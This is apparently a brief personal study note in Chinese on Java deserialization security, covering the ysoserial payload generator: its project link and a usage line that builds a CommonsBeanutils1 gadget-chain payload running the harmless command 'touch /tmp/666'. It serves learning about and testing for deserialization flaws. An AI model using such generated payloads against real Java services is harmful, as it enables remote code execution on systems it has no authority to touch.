created: 2025-05-08 01:07 tags: - java安全 - java反序列化 Type: Note aliases: - ysoserial updated: 2025-05-08 01:07
项目地址:GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
基本使用
java -jar ysoserial.jar 【链子】 【命令】 java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/666" > payload.class